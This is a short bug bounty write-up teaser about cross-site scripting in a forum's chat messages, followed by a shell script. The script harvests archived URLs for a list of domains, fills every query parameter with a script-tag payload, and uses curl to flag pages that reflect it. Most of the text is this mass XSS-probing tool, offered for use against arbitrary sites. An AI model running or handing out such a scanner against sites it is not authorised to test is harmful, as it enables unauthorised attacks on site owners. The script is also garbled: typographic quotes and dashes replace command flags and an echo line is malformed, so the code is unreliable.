vulnerability name: cross site scripting through chat messages Here is the vulnerability that reported long back for vanilla organisation and rewarded.I just wanted to share write up here. At first Usually i start with trying xss injection.I started by searching where ever i can insert the inputs later i thought…

#!/bin/sh filename=$1 while read url; do cd Reconway mkdir $url cd $url touch $url-waygau cd echo “==================WAYBACK and GAU::)====================” waybackurls $url|tee $url-waygau gau $url|tee -a $url-waygau cat $url-waygau.txt|grep “=”|qsreplace test|sort -u $url-waygau -o $url-waygau echo “==================CHECKING XSS FIRST::)====================” cat $url-waygau|gf xss|qsreplace ‘“><script>confirm(1)</script>’|while read host ; do curl — silent — path-as-is — insecure “$host”|grep -qs “<script>confirm(1)”&&echo -e “$host \033[0;31mXSS Vulnerable\n” \e[0m”; done